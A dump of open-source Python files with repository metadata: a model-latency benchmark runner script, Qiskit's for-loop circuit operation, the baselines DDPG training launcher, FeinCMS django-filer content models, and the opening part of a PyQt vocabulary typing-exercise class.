import sys sys.path.append("../") import json import os import argparse import torch import shutil import numpy as np num_loop = 1 for bs in [1, 5, 6]: op = 'CUDA_VISIBLE_DEVICES=0 python ar_test.py -i 0 -em test -analyze -write_time -beam_size %d'%bs os.system(op) for iteration in range(1, 8): for i in range(num_loop): op = 'CUDA_VISIBLE_DEVICES=0 python test_nar.py --index 0 -em test -nd -paradigm mp -print_latency -write_time -lbs 6 -s 100 ' + ' -i %d'%iteration os.system(op) for iteration in range(1, 8): for i in range(num_loop): op = 'CUDA_VISIBLE_DEVICES=0 python test_nar.py --index -2 -em test -nd -paradigm mp -print_latency -write_time -lbs 6 ' + ' -i %d'%iteration os.system(op) myset = [[1,1], [1, 2],[1, 3], [1, 4],[1, 5]] for item in myset: i, lbs = item op = 'CUDA_VISIBLE_DEVICES=0 python test_nar.py --index 0 -em test -nd -paradigm mp -s 100 -print_latency -write_time' + ' -i %d'%i + ' -lbs %d'%lbs os.system(op) for q in range(4, 0, -1): for iteration in range(2): for i in range(num_loop): op = 'CUDA_VISIBLE_DEVICES=0 python test_nar.py --index 0 -em test -nd -paradigm ef -s 100 -print_latency -write_time -lbs 6 ' + ' -i %d'%iteration + ' -q %d'%q os.system(op)
true
true
f728f0d04d3651b4023f52477fccaa85cf8b99cf
8,361
py
Python
qiskit/circuit/controlflow/for_loop.py
boschmitt/qiskit-terra
1a1235a7206bdf293d153d285f932e80151e9cb4
[ "Apache-2.0" ]
null
null
null
qiskit/circuit/controlflow/for_loop.py
boschmitt/qiskit-terra
1a1235a7206bdf293d153d285f932e80151e9cb4
[ "Apache-2.0" ]
7
2021-10-14T12:38:24.000Z
2022-03-21T11:20:02.000Z
qiskit/circuit/controlflow/for_loop.py
boschmitt/qiskit-terra
1a1235a7206bdf293d153d285f932e80151e9cb4
[ "Apache-2.0" ]
null
null
null
# This code is part of Qiskit. # # (C) Copyright IBM 2021. # # This code is licensed under the Apache License, Version 2.0. You may # obtain a copy of this license in the LICENSE.txt file in the root directory # of this source tree or at http://www.apache.org/licenses/LICENSE-2.0. # # Any modifications or derivative works of this code must retain this # copyright notice, and modified files need to carry a notice indicating # that they have been altered from the originals. "Circuit operation representing a ``for`` loop." import warnings from typing import Iterable, Optional, Union from qiskit.circuit.parameter import Parameter from qiskit.circuit.exceptions import CircuitError from qiskit.circuit.quantumcircuit import QuantumCircuit from .control_flow import ControlFlowOp class ForLoopOp(ControlFlowOp): """A circuit operation which repeatedly executes a subcircuit (``body``) parameterized by a parameter ``loop_parameter`` through the set of integer values provided in ``indexset``. Parameters: indexset: A collection of integers to loop over. loop_parameter: The placeholder parameterizing ``body`` to which the values from ``indexset`` will be assigned. body: The loop body to be repeatedly executed. label: An optional label for identifying the instruction. **Circuit symbol:** .. parsed-literal:: ┌───────────┐ q_0: ┤0 ├ │ │ q_1: ┤1 ├ │ for_loop │ q_2: ┤2 ├ │ │ c_0: ╡0 ╞ └───────────┘ """ def __init__( self, indexset: Iterable[int], loop_parameter: Union[Parameter, None], body: QuantumCircuit, label: Optional[str] = None, ): num_qubits = body.num_qubits num_clbits = body.num_clbits super().__init__( "for_loop", num_qubits, num_clbits, [indexset, loop_parameter, body], label=label ) @property def params(self): return self._params @params.setter def params(self, parameters): indexset, loop_parameter, body = parameters if not isinstance(loop_parameter, (Parameter, type(None))): raise CircuitError( "ForLoopOp expects a loop_parameter parameter to " "be either of type Parameter or None, but received " f"{type(loop_parameter)}." ) if not isinstance(body, QuantumCircuit): raise CircuitError( "ForLoopOp expects a body parameter to be of type " f"QuantumCircuit, but received {type(body)}." ) if body.num_qubits != self.num_qubits or body.num_clbits != self.num_clbits: raise CircuitError( "Attempted to assign a body parameter with a num_qubits or " "num_clbits different than that of the ForLoopOp. " f"ForLoopOp num_qubits/clbits: {self.num_qubits}/{self.num_clbits} " f"Supplied body num_qubits/clbits: {body.num_qubits}/{body.num_clbits}." ) if ( loop_parameter is not None and loop_parameter not in body.parameters and loop_parameter.name in (p.name for p in body.parameters) ): warnings.warn( "The Parameter provided as a loop_parameter was not found " "on the loop body and so no binding of the indexset to loop " "parameter will occur. A different Parameter of the same name " f"({loop_parameter.name}) was found. If you intended to loop " "over that Parameter, please use that Parameter instance as " "the loop_parameter.", stacklevel=2, ) # Consume indexset into a tuple unless it was provided as a range. # Preserve ranges so that they can be exported as OpenQASM3 ranges. indexset = indexset if isinstance(indexset, range) else tuple(indexset) self._params = [indexset, loop_parameter, body] @property def blocks(self): return (self._params[2],) class ForLoopContext: """A context manager for building up ``for`` loops onto circuits in a natural order, without having to construct the loop body first. Within the block, a lot of the bookkeeping is done for you; you do not need to keep track of which qubits and clbits you are using, for example, and a loop parameter will be allocated for you, if you do not supply one yourself. All normal methods of accessing the qubits on the underlying :obj:`~QuantumCircuit` will work correctly, and resolve into correct accesses within the interior block. You generally should never need to instantiate this object directly. Instead, use :obj:`.QuantumCircuit.for_loop` in its context-manager form, i.e. by not supplying a ``body`` or sets of qubits and clbits. Example usage:: import math from qiskit import QuantumCircuit qc = QuantumCircuit(2, 1) with qc.for_loop(None, range(5)) as i: qc.rx(i * math.pi/4, 0) qc.cx(0, 1) qc.measure(0, 0) qc.break_loop().c_if(0) This context should almost invariably be created by a :meth:`.QuantumCircuit.for_loop` call, and the resulting instance is a "friend" of the calling circuit. The context will manipulate the circuit's defined scopes when it is entered (by pushing a new scope onto the stack) and exited (by popping its scope, building it, and appending the resulting :obj:`.ForLoopOp`). """ # Class-level variable keep track of the number of auto-generated loop variables, so we don't # get naming clashes. _generated_loop_parameters = 0 __slots__ = ( "_circuit", "_generate_loop_parameter", "_loop_parameter", "_indexset", "_label", "_used", ) def __init__( self, circuit: QuantumCircuit, indexset: Iterable[int], loop_parameter: Optional[Parameter] = None, *, label: Optional[str] = None, ): self._circuit = circuit self._generate_loop_parameter = loop_parameter is None self._loop_parameter = loop_parameter # We can pass through `range` instances because OpenQASM 3 has native support for this type # of iterator set. self._indexset = indexset if isinstance(indexset, range) else tuple(indexset) self._label = label self._used = False def __enter__(self): if self._used: raise CircuitError("A for-loop context manager cannot be re-entered.") self._used = True self._circuit._push_scope() if self._generate_loop_parameter: self._loop_parameter = Parameter(f"_loop_i_{self._generated_loop_parameters}") type(self)._generated_loop_parameters += 1 return self._loop_parameter def __exit__(self, exc_type, exc_val, exc_tb): if exc_type is not None: # If we're leaving the context manager because an exception was raised, there's nothing # to do except restore the circuit state. self._circuit._pop_scope() return False scope = self._circuit._pop_scope() # Loops do not need to pass any further resources in, because this scope itself defines the # extent of ``break`` and ``continue`` statements. body = scope.build(scope.qubits, scope.clbits) # We always bind the loop parameter if the user gave it to us, even if it isn't actually # used, because they requested we do that by giving us a parameter. However, if they asked # us to auto-generate a parameter, then we only add it if they actually used it, to avoid # using unnecessary resources. if self._generate_loop_parameter and self._loop_parameter not in body.parameters: loop_parameter = None else: loop_parameter = self._loop_parameter self._circuit.append( ForLoopOp(self._indexset, loop_parameter, body, label=self._label), tuple(body.qubits), tuple(body.clbits), ) return False
38.529954
100
0.634852
import warnings from typing import Iterable, Optional, Union from qiskit.circuit.parameter import Parameter from qiskit.circuit.exceptions import CircuitError from qiskit.circuit.quantumcircuit import QuantumCircuit from .control_flow import ControlFlowOp class ForLoopOp(ControlFlowOp): def __init__( self, indexset: Iterable[int], loop_parameter: Union[Parameter, None], body: QuantumCircuit, label: Optional[str] = None, ): num_qubits = body.num_qubits num_clbits = body.num_clbits super().__init__( "for_loop", num_qubits, num_clbits, [indexset, loop_parameter, body], label=label ) @property def params(self): return self._params @params.setter def params(self, parameters): indexset, loop_parameter, body = parameters if not isinstance(loop_parameter, (Parameter, type(None))): raise CircuitError( "ForLoopOp expects a loop_parameter parameter to " "be either of type Parameter or None, but received " f"{type(loop_parameter)}." ) if not isinstance(body, QuantumCircuit): raise CircuitError( "ForLoopOp expects a body parameter to be of type " f"QuantumCircuit, but received {type(body)}." ) if body.num_qubits != self.num_qubits or body.num_clbits != self.num_clbits: raise CircuitError( "Attempted to assign a body parameter with a num_qubits or " "num_clbits different than that of the ForLoopOp. " f"ForLoopOp num_qubits/clbits: {self.num_qubits}/{self.num_clbits} " f"Supplied body num_qubits/clbits: {body.num_qubits}/{body.num_clbits}." ) if ( loop_parameter is not None and loop_parameter not in body.parameters and loop_parameter.name in (p.name for p in body.parameters) ): warnings.warn( "The Parameter provided as a loop_parameter was not found " "on the loop body and so no binding of the indexset to loop " "parameter will occur. A different Parameter of the same name " f"({loop_parameter.name}) was found. If you intended to loop " "over that Parameter, please use that Parameter instance as " "the loop_parameter.", stacklevel=2, ) indexset = indexset if isinstance(indexset, range) else tuple(indexset) self._params = [indexset, loop_parameter, body] @property def blocks(self): return (self._params[2],) class ForLoopContext: # get naming clashes. _generated_loop_parameters = 0 __slots__ = ( "_circuit", "_generate_loop_parameter", "_loop_parameter", "_indexset", "_label", "_used", ) def __init__( self, circuit: QuantumCircuit, indexset: Iterable[int], loop_parameter: Optional[Parameter] = None, *, label: Optional[str] = None, ): self._circuit = circuit self._generate_loop_parameter = loop_parameter is None self._loop_parameter = loop_parameter # We can pass through `range` instances because OpenQASM 3 has native support for this type # of iterator set. self._indexset = indexset if isinstance(indexset, range) else tuple(indexset) self._label = label self._used = False def __enter__(self): if self._used: raise CircuitError("A for-loop context manager cannot be re-entered.") self._used = True self._circuit._push_scope() if self._generate_loop_parameter: self._loop_parameter = Parameter(f"_loop_i_{self._generated_loop_parameters}") type(self)._generated_loop_parameters += 1 return self._loop_parameter def __exit__(self, exc_type, exc_val, exc_tb): if exc_type is not None: # If we're leaving the context manager because an exception was raised, there's nothing # to do except restore the circuit state. self._circuit._pop_scope() return False scope = self._circuit._pop_scope() # Loops do not need to pass any further resources in, because this scope itself defines the # extent of ``break`` and ``continue`` statements. body = scope.build(scope.qubits, scope.clbits) # We always bind the loop parameter if the user gave it to us, even if it isn't actually if self._generate_loop_parameter and self._loop_parameter not in body.parameters: loop_parameter = None else: loop_parameter = self._loop_parameter self._circuit.append( ForLoopOp(self._indexset, loop_parameter, body, label=self._label), tuple(body.qubits), tuple(body.clbits), ) return False
true
true
f728f0e8a193188e2b3867c59814c0860e7e1ed5
5,671
py
Python
baselines/ddpg/main.py
wensun/baselines
81b7b988918de2c1c2f5fa9f38b7716608efc125
[ "MIT" ]
null
null
null
baselines/ddpg/main.py
wensun/baselines
81b7b988918de2c1c2f5fa9f38b7716608efc125
[ "MIT" ]
null
null
null
baselines/ddpg/main.py
wensun/baselines
81b7b988918de2c1c2f5fa9f38b7716608efc125
[ "MIT" ]
null
null
null
import argparse import time import os import logging from baselines import logger, bench from baselines.common.misc_util import ( set_global_seeds, boolean_flag, ) #import baselines.ddpg.training as training import training as training from baselines.ddpg.models import Actor, Critic from baselines.ddpg.memory import Memory from baselines.ddpg.noise import * import gym import tensorflow as tf from mpi4py import MPI def run(env_id, seed, noise_type, layer_norm, evaluation, **kwargs): # Configure things. rank = MPI.COMM_WORLD.Get_rank() if rank != 0: logger.set_level(logger.DISABLED) # Create envs. env = gym.make(env_id) env = bench.Monitor(env, logger.get_dir() and os.path.join(logger.get_dir(), str(rank))) if evaluation and rank==0: eval_env = gym.make(env_id) eval_env = bench.Monitor(eval_env, os.path.join(logger.get_dir(), 'gym_eval')) #env = bench.Monitor(env, None) else: eval_env = None # Parse noise_type action_noise = None param_noise = None nb_actions = env.action_space.shape[-1] for current_noise_type in noise_type.split(','): current_noise_type = current_noise_type.strip() if current_noise_type == 'none': pass elif 'adaptive-param' in current_noise_type: _, stddev = current_noise_type.split('_') param_noise = AdaptiveParamNoiseSpec(initial_stddev=float(stddev), desired_action_stddev=float(stddev)) elif 'normal' in current_noise_type: _, stddev = current_noise_type.split('_') action_noise = NormalActionNoise(mu=np.zeros(nb_actions), sigma=float(stddev) * np.ones(nb_actions)) elif 'ou' in current_noise_type: _, stddev = current_noise_type.split('_') action_noise = OrnsteinUhlenbeckActionNoise(mu=np.zeros(nb_actions), sigma=float(stddev) * np.ones(nb_actions)) else: raise RuntimeError('unknown noise type "{}"'.format(current_noise_type)) # Configure components. memory = Memory(limit=int(1e6), action_shape=env.action_space.shape, observation_shape=env.observation_space.shape) critic = Critic(layer_norm=layer_norm) actor = Actor(nb_actions, layer_norm=layer_norm) # Seed everything to make things reproducible. seed = seed + 1000000 * rank logger.info('rank {}: seed={}, logdir={}'.format(rank, seed, logger.get_dir())) tf.reset_default_graph() set_global_seeds(seed) env.seed(seed) if eval_env is not None: eval_env.seed(seed) # Disable logging for rank != 0 to avoid noise. if rank == 0: start_time = time.time() training.train(env=env, eval_env=eval_env, param_noise=param_noise, action_noise=action_noise, actor=actor, critic=critic, memory=memory, **kwargs) env.close() if eval_env is not None: eval_env.close() if rank == 0: logger.info('total runtime: {}s'.format(time.time() - start_time)) def parse_args(): parser = argparse.ArgumentParser(formatter_class=argparse.ArgumentDefaultsHelpFormatter) parser.add_argument('--env-id', type=str, default='HalfCheetah-v2') boolean_flag(parser, 'render-eval', default=False) boolean_flag(parser, 'layer-norm', default=True) boolean_flag(parser, 'render', default=False) boolean_flag(parser, 'normalize-returns', default=False) boolean_flag(parser, 'normalize-observations', default=True) parser.add_argument('--seed', help='RNG seed', type=int, default=0) parser.add_argument('--critic-l2-reg', type=float, default=1e-2) parser.add_argument('--batch-size', type=int, default=64) # per MPI worker parser.add_argument('--actor-lr', type=float, default=1e-4) parser.add_argument('--critic-lr', type=float, default=1e-3) boolean_flag(parser, 'popart', default=False) parser.add_argument('--gamma', type=float, default=0.99) parser.add_argument('--reward-scale', type=float, default=1.) parser.add_argument('--clip-norm', type=float, default=None) parser.add_argument('--nb-epochs', type=int, default=500) # with default settings, perform 1M steps total, was 500 parser.add_argument('--nb-epoch-cycles', type=int, default=20) parser.add_argument('--nb-train-steps', type=int, default=50) # per epoch cycle and MPI worker parser.add_argument('--nb-eval-steps', type=int, default=1000) # per epoch cycle and MPI worker parser.add_argument('--nb-rollout-steps', type=int, default=100) # per epoch cycle and MPI worker parser.add_argument('--noise-type', type=str, default='adaptive-param_0.2') # choices are adaptive-param_xx, ou_xx, normal_xx, none parser.add_argument('--num-timesteps', type=int, default=None) parser.add_argument('--alg', type=str, default='DDPG') # DDPG or DDPGRM #boolean_flag(parser, 'evaluation', default=False) boolean_flag(parser, 'evaluation', default=True) #turn evaluation on args = parser.parse_args() # we don't directly specify timesteps for this script, so make sure that if we do specify them # they agree with the other parameters. default: 1M total steps eval_steps_per_epoch = args.nb_epoch_cycles*args.nb_eval_steps #defualt: 1000*20 = 10K (~ 20 episodes) print(args) if args.num_timesteps is not None: assert(args.num_timesteps == args.nb_epochs * args.nb_epoch_cycles * args.nb_rollout_steps) dict_args = vars(args) del dict_args['num_timesteps'] return dict_args if __name__ == '__main__': args = parse_args() if MPI.COMM_WORLD.Get_rank() == 0: logger.configure() # Run actual script. run(**args)
42.962121
136
0.696703
import argparse import time import os import logging from baselines import logger, bench from baselines.common.misc_util import ( set_global_seeds, boolean_flag, ) import training as training from baselines.ddpg.models import Actor, Critic from baselines.ddpg.memory import Memory from baselines.ddpg.noise import * import gym import tensorflow as tf from mpi4py import MPI def run(env_id, seed, noise_type, layer_norm, evaluation, **kwargs): rank = MPI.COMM_WORLD.Get_rank() if rank != 0: logger.set_level(logger.DISABLED) env = gym.make(env_id) env = bench.Monitor(env, logger.get_dir() and os.path.join(logger.get_dir(), str(rank))) if evaluation and rank==0: eval_env = gym.make(env_id) eval_env = bench.Monitor(eval_env, os.path.join(logger.get_dir(), 'gym_eval')) else: eval_env = None action_noise = None param_noise = None nb_actions = env.action_space.shape[-1] for current_noise_type in noise_type.split(','): current_noise_type = current_noise_type.strip() if current_noise_type == 'none': pass elif 'adaptive-param' in current_noise_type: _, stddev = current_noise_type.split('_') param_noise = AdaptiveParamNoiseSpec(initial_stddev=float(stddev), desired_action_stddev=float(stddev)) elif 'normal' in current_noise_type: _, stddev = current_noise_type.split('_') action_noise = NormalActionNoise(mu=np.zeros(nb_actions), sigma=float(stddev) * np.ones(nb_actions)) elif 'ou' in current_noise_type: _, stddev = current_noise_type.split('_') action_noise = OrnsteinUhlenbeckActionNoise(mu=np.zeros(nb_actions), sigma=float(stddev) * np.ones(nb_actions)) else: raise RuntimeError('unknown noise type "{}"'.format(current_noise_type)) memory = Memory(limit=int(1e6), action_shape=env.action_space.shape, observation_shape=env.observation_space.shape) critic = Critic(layer_norm=layer_norm) actor = Actor(nb_actions, layer_norm=layer_norm) seed = seed + 1000000 * rank logger.info('rank {}: seed={}, logdir={}'.format(rank, seed, logger.get_dir())) tf.reset_default_graph() set_global_seeds(seed) env.seed(seed) if eval_env is not None: eval_env.seed(seed) if rank == 0: start_time = time.time() training.train(env=env, eval_env=eval_env, param_noise=param_noise, action_noise=action_noise, actor=actor, critic=critic, memory=memory, **kwargs) env.close() if eval_env is not None: eval_env.close() if rank == 0: logger.info('total runtime: {}s'.format(time.time() - start_time)) def parse_args(): parser = argparse.ArgumentParser(formatter_class=argparse.ArgumentDefaultsHelpFormatter) parser.add_argument('--env-id', type=str, default='HalfCheetah-v2') boolean_flag(parser, 'render-eval', default=False) boolean_flag(parser, 'layer-norm', default=True) boolean_flag(parser, 'render', default=False) boolean_flag(parser, 'normalize-returns', default=False) boolean_flag(parser, 'normalize-observations', default=True) parser.add_argument('--seed', help='RNG seed', type=int, default=0) parser.add_argument('--critic-l2-reg', type=float, default=1e-2) parser.add_argument('--batch-size', type=int, default=64) parser.add_argument('--actor-lr', type=float, default=1e-4) parser.add_argument('--critic-lr', type=float, default=1e-3) boolean_flag(parser, 'popart', default=False) parser.add_argument('--gamma', type=float, default=0.99) parser.add_argument('--reward-scale', type=float, default=1.) parser.add_argument('--clip-norm', type=float, default=None) parser.add_argument('--nb-epochs', type=int, default=500) parser.add_argument('--nb-epoch-cycles', type=int, default=20) parser.add_argument('--nb-train-steps', type=int, default=50) parser.add_argument('--nb-eval-steps', type=int, default=1000) parser.add_argument('--nb-rollout-steps', type=int, default=100) parser.add_argument('--noise-type', type=str, default='adaptive-param_0.2') parser.add_argument('--num-timesteps', type=int, default=None) parser.add_argument('--alg', type=str, default='DDPG') boolean_flag(parser, 'evaluation', default=True) args = parser.parse_args() # they agree with the other parameters. default: 1M total steps eval_steps_per_epoch = args.nb_epoch_cycles*args.nb_eval_steps #defualt: 1000*20 = 10K (~ 20 episodes) print(args) if args.num_timesteps is not None: assert(args.num_timesteps == args.nb_epochs * args.nb_epoch_cycles * args.nb_rollout_steps) dict_args = vars(args) del dict_args['num_timesteps'] return dict_args if __name__ == '__main__': args = parse_args() if MPI.COMM_WORLD.Get_rank() == 0: logger.configure() # Run actual script. run(**args)
true
true
f728f0fa1b2ee82aebef93fdc59f9d8021dc8a1a
3,779
py
Python
feincms/content/filer/models.py
ixc/feincms
d3746174190acbe7caf32078ddc5ec7c2e48b8ef
[ "BSD-3-Clause" ]
1
2016-05-07T11:50:28.000Z
2016-05-07T11:50:28.000Z
feincms/content/filer/models.py
ixc/feincms
d3746174190acbe7caf32078ddc5ec7c2e48b8ef
[ "BSD-3-Clause" ]
null
null
null
feincms/content/filer/models.py
ixc/feincms
d3746174190acbe7caf32078ddc5ec7c2e48b8ef
[ "BSD-3-Clause" ]
1
2019-03-15T19:36:34.000Z
2019-03-15T19:36:34.000Z
from __future__ import absolute_import, unicode_literals from django.contrib import admin from django.core.exceptions import ImproperlyConfigured from django.db import models from django.utils.translation import ugettext_lazy as _ from feincms.admin.item_editor import FeinCMSInline from feincms._internal import ct_render_to_string try: from filer.fields.file import FilerFileField from filer.fields.image import FilerImageField except ImportError: __all__ = () else: __all__ = ( 'MediaFileContentInline', 'ContentWithFilerFile', 'FilerFileContent', 'FilerImageContent', ) class MediaFileContentInline(FeinCMSInline): radio_fields = {'type': admin.VERTICAL} class ContentWithFilerFile(models.Model): """ File content """ feincms_item_editor_inline = MediaFileContentInline class Meta: abstract = True def render(self, **kwargs): return ct_render_to_string( [ 'content/filer/%s_%s.html' % (self.file_type, self.type), 'content/filer/%s.html' % self.type, 'content/filer/%s.html' % self.file_type, 'content/filer/default.html', ], {'content': self}, request=kwargs.get('request'), context=kwargs.get('context'), ) class FilerFileContent(ContentWithFilerFile): mediafile = FilerFileField(verbose_name=_('file'), related_name='+') file_type = 'file' type = 'download' class Meta: abstract = True verbose_name = _('file') verbose_name_plural = _('files') class FilerImageContent(ContentWithFilerFile): """ Create a media file content as follows:: from feincms.contents import FilerImageContent Page.create_content_type(FilerImageContent, TYPE_CHOICES=( ('inline', _('Default')), ('lightbox', _('Lightbox')), ('whatever', _('Whatever')), )) For a media file of type 'image' and type 'lightbox', the following templates are tried in order: * content/mediafile/image_lightbox.html * content/mediafile/lightbox.html * content/mediafile/image.html * content/mediafile/default.html The context contains ``content`` and ``request`` (if available). The content.mediafile attribute are as follows (selection): label, description, default_caption, default_alt_text, author, must_always_publish_author_credit, must_always_publish_copyright, date_taken, file, id, is_public, url """ mediafile = FilerImageField(verbose_name=_('image'), related_name='+') caption = models.CharField( _('caption'), max_length=1000, blank=True, ) url = models.CharField( _('URL'), max_length=1000, blank=True, ) file_type = 'image' class Meta: abstract = True verbose_name = _('image') verbose_name_plural = _('images') @classmethod def initialize_type(cls, TYPE_CHOICES=None): if TYPE_CHOICES is None: raise ImproperlyConfigured( 'You have to set TYPE_CHOICES when' ' creating a %s' % cls.__name__) cls.add_to_class( 'type', models.CharField( _('type'), max_length=20, choices=TYPE_CHOICES, default=TYPE_CHOICES[0][0], ), )
31.231405
78
0.576078
from __future__ import absolute_import, unicode_literals from django.contrib import admin from django.core.exceptions import ImproperlyConfigured from django.db import models from django.utils.translation import ugettext_lazy as _ from feincms.admin.item_editor import FeinCMSInline from feincms._internal import ct_render_to_string try: from filer.fields.file import FilerFileField from filer.fields.image import FilerImageField except ImportError: __all__ = () else: __all__ = ( 'MediaFileContentInline', 'ContentWithFilerFile', 'FilerFileContent', 'FilerImageContent', ) class MediaFileContentInline(FeinCMSInline): radio_fields = {'type': admin.VERTICAL} class ContentWithFilerFile(models.Model): """ File content """ feincms_item_editor_inline = MediaFileContentInline class Meta: abstract = True def render(self, **kwargs): return ct_render_to_string( [ 'content/filer/%s_%s.html' % (self.file_type, self.type), 'content/filer/%s.html' % self.type, 'content/filer/%s.html' % self.file_type, 'content/filer/default.html', ], {'content': self}, request=kwargs.get('request'), context=kwargs.get('context'), ) class FilerFileContent(ContentWithFilerFile): mediafile = FilerFileField(verbose_name=_('file'), related_name='+') file_type = 'file' type = 'download' class Meta: abstract = True verbose_name = _('file') verbose_name_plural = _('files') class FilerImageContent(ContentWithFilerFile): """ Create a media file content as follows:: from feincms.contents import FilerImageContent Page.create_content_type(FilerImageContent, TYPE_CHOICES=( ('inline', _('Default')), ('lightbox', _('Lightbox')), ('whatever', _('Whatever')), )) For a media file of type 'image' and type 'lightbox', the following templates are tried in order: * content/mediafile/image_lightbox.html * content/mediafile/lightbox.html * content/mediafile/image.html * content/mediafile/default.html The context contains ``content`` and ``request`` (if available). The content.mediafile attribute are as follows (selection): label, description, default_caption, default_alt_text, author, must_always_publish_author_credit, must_always_publish_copyright, date_taken, file, id, is_public, url """ mediafile = FilerImageField(verbose_name=_('image'), related_name='+') caption = models.CharField( _('caption'), max_length=1000, blank=True, ) url = models.CharField( _('URL'), max_length=1000, blank=True, ) file_type = 'image' class Meta: abstract = True verbose_name = _('image') verbose_name_plural = _('images') @classmethod def initialize_type(cls, TYPE_CHOICES=None): if TYPE_CHOICES is None: raise ImproperlyConfigured( 'You have to set TYPE_CHOICES when' ' creating a %s' % cls.__name__) cls.add_to_class( 'type', models.CharField( _('type'), max_length=20, choices=TYPE_CHOICES, default=TYPE_CHOICES[0][0], ), )
true
true
f728f1fe99a294562108e7f14024099bb7779f8d
10,345
py
Python
src/TypingExercise.py
mruiz42/zhong-wen-trainer-master
b565c40185d7184515be335d848a653cc7f86b51
[ "Unlicense" ]
2
2021-02-16T11:09:17.000Z
2021-12-17T13:50:40.000Z
src/TypingExercise.py
mruiz42/zhong-wen-trainer-master
b565c40185d7184515be335d848a653cc7f86b51
[ "Unlicense" ]
4
2019-05-18T02:16:02.000Z
2021-12-17T14:58:43.000Z
src/TypingExercise.py
mruiz42/zhong-wen-trainer-master
b565c40185d7184515be335d848a653cc7f86b51
[ "Unlicense" ]
null
null
null
from src.StarDelegate import * from src.driverUi.callReview import * from datetime import * from src.utilities.SqlTools import * from PyQt5.QtGui import QStandardItemModel, QStandardItem class TypingExercise(): def __init__(self, main_window, word_deck, parent=None): super(TypingExercise, self).__init__() self.win = main_window self.wordDeck = word_deck self.model = QStandardItemModel() # Model used for displaying review session test_data self.missedWordSet = set() # Set used to keep track of all missed words self.reviewSet = set() self.startTime = datetime.datetime.now() print("Started session at: ", self.startTime) def resetUi(self): #self.mainWindow.ui.progressBar_typing.reset() self.setStatLabels() self.win.ui.pushButton_enter.setEnabled(True) self.win.ui.pushButton_enter.clicked.connect(self.submitAnswer) self.win.ui.pushButton_notSure_Skip.clicked.connect(self.nextWord) self.win.ui.pushButton_notSure_Skip.hide() self.win.ui.lineEdit_answer.textEdited['QString'].connect(lambda: self.win.ui.pushButton_enter.setText("Enter")) def setStatLabels(self): cn = self.wordDeck.cardNum timesCorrect = self.wordDeck.studyList[cn].timesCorrect timesMissed = str(self.wordDeck.studyList[cn].timesAttempted - timesCorrect) self.win.ui.label_typingCorrect.setText("Times Correct: " + str(timesCorrect)) self.win.ui.label_typingMissed.setText("Times Missed: " + str(timesMissed)) def buildAnswerList(self, input_str): '''This function will build a list of answers from the database string''' tempAnsList = [] ansList = [] # Check if there are multiple definitions separated by semicolon if ';' in input_str: tempAnsList = input_str.split(';') # If not, add the single string to a list else: tempAnsList.append(input_str) for ans in tempAnsList: # if '(' in ans: # # optionalAns = ans.replace(")", "").split("(") # # ansList.append(self.sanitizeInput(optionalAns[0])) # # ansList.append(self.sanitizeInput(optionalAns[1])) pos = ans.find('(') if pos != -1: ans = ans[pos:] a = self.sanitizeInput(ans) if len(a) > 0 and a != " ": ansList.append(a) return ansList def compareAnswerLists(self, user_input_list:list, answer_list:list): for u in user_input_list: if u in answer_list: return True return False def submitAnswer(self): currWordData = self.wordDeck.studyList[self.wordDeck.cardNum] userInput = self.win.ui.lineEdit_answer.text() answer = self.wordDeck.studyList[self.wordDeck.cardNum].definition userInputList = self.buildAnswerList(userInput) answerList = self.buildAnswerList(answer) print("user input:",userInputList, " answer:", answerList) # Check answer list against user input list if self.compareAnswerLists(userInputList, answerList): self.proceedUi() print("Current word test_data: ", currWordData) self.reviewSet.add(currWordData) else: self.pauseUi(answerList) print("Current word test_data: ", currWordData) self.missedWordSet.add(currWordData) def pauseUi(self, answer_list:list): cn = self.wordDeck.cardNum self.wordDeck.studyList[cn].timesAttempted += 1 self.setStatLabels() self.wordDeck.missedWordList.append(self.wordDeck.studyList[cn]) # Add to incorrect list # how to prevent attempted from increasing on "enter it correctly" call self.win.ui.lineEdit_answer.textChanged.connect(lambda: self.unpauseUi(answer_list)) percentLabelStr = self.wordDeck.calcPercentageCorrect() answerLabelStr = self.wordDeck.studyList[cn].definition self.win.ui.label_typingFractionCorrect.setText("%" + str(percentLabelStr)) #self.mainWindow.ui.pushButton_enter.setText("Enter") self.win.ui.pushButton_notSure_Skip.show() self.win.ui.lineEdit_answer.clear() self.win.ui.label_typingWord.setText("Oops! Correct answer is:\n" + answerLabelStr) self.win.ui.pushButton_notSure_Skip.setText("I was right") self.win.ui.pushButton_notSure_Skip.clicked.disconnect() self.win.ui.pushButton_notSure_Skip.clicked.connect(self.wasRight) self.win.ui.lineEdit_answer.setPlaceholderText("Enter the correct answer") def wasRight(self): cn = self.wordDeck.cardNum print(self.wordDeck.studyList[cn]) self.wordDeck.studyList[cn].timesAttempted -= 1 print(self.wordDeck.studyList[cn]) self.nextWord() def unpauseUi(self, answer_list:str): userInputList = self.sanitizeInput(self.win.ui.lineEdit_answer.text()) if userInputList in answer_list: print("ui unpauesd") self.win.ui.pushButton_enter.setText("Enter") self.win.ui.pushButton_enter.setEnabled(True) # self.mainWindow.ui.lineEdit_answer.textChanged.disconnect() self.win.ui.pushButton_enter.clicked.disconnect() self.win.ui.pushButton_enter.clicked.connect(self.nextWord) else: self.win.ui.pushButton_enter.setEnabled(False) def proceedUi(self): cn = self.wordDeck.cardNum answer = self.wordDeck.studyList[cn].definition self.wordDeck.studyList[cn].timesCorrect += 1 self.wordDeck.studyList[cn].timesAttempted += 1 self.setStatLabels() percent = self.wordDeck.calcPercentageCorrect() self.win.ui.lineEdit_answer.clear() self.win.ui.label_typingFractionCorrect.setText("%" + str(percent)) self.win.ui.label_typingWord.setText("Correct!\n" + answer) self.win.ui.pushButton_enter.setText("Continue") self.win.ui.lineEdit_answer.setPlaceholderText("Press Enter to continue") self.win.ui.lineEdit_answer.setDisabled(True) self.win.ui.pushButton_enter.clicked.disconnect() self.win.ui.pushButton_enter.clicked.connect(self.nextWord) def intermission(self): ''' This function will serve as a breakpoint in the typing module where the user can review their progress and the program will make a call to save session test_data into the database. ''' review = ReviewDialog(self.win) combinedSet = self.missedWordSet | self.reviewSet self.model.clear() for i in combinedSet: # IS_STARRED, WORD, DEFINITION, PRONUN, TC, TM cardNum = QStandardItem(str(i.cardNum)) timesMissed = i.timesAttempted - i.timesCorrect isStarred = QStandardItem(str(i.isStarred)) #isStarred.itemChanged.connect(lambda: self.changeStar(isStarred)) vocabulary = QStandardItem(i.vocabulary) definition = QStandardItem(i.definition) pronunciation = QStandardItem(i.pronunciation) timesCorrect = QStandardItem(str(i.timesCorrect)) timesMissed = QStandardItem(str(timesMissed)) row = [cardNum, isStarred, vocabulary, definition, pronunciation, timesCorrect, timesMissed] print(i.timesAttempted, 